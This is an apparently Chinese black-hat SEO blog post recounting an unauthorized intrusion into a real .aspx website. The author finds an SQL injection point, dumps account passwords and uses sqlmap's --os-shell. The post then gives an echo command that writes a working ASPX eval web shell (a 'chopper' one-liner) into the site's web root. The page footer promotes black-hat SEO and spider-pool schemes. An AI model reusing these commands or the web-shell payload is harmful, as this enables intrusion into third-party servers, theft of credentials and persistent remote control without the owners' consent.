黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

一次蛋疼的Sqlmap --os-shell

  第一天

  找到一个注入点 站点是aspx

  跑着跑着。跑出了账户密码

  但是没后台 尝试sqlmap.py -u “http://www.***com.cn/news_cont.aspx?id=*0” –os-shell

  sqlmap自带一句话写不进去。

  日什么站,睡觉。

  第二天,御剑再次扫描。

  发现根目录下。多了一个1.php和a.txt

  这个站有人盯上了。而且估计已经入侵。

  我又研究了下

  找到网站相对路径 c:\Web_www\Web_www\

  os shell

一次蛋疼的Sqlmap –os-shell

  想到了提权 add user 好像没那么高权限,

  想到了用cmd直接在c:\Web_www\Web_www\目录下创建shell

  头晕了。

  echo ^^ >>c:\Web_www\Web_www\126.txt

  执行命令,发现 怎么是个文本。特么的发现 一句话后面的> 不见了

  然后用asp一句话。500内部错误,半天才想到,这他妈的是个aspx的站点。

  echo “<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>“>>c:\Web_www\Web_www\123.aspx成功写入。

  附图

  

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » 一次蛋疼的Sqlmap --os-shell
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜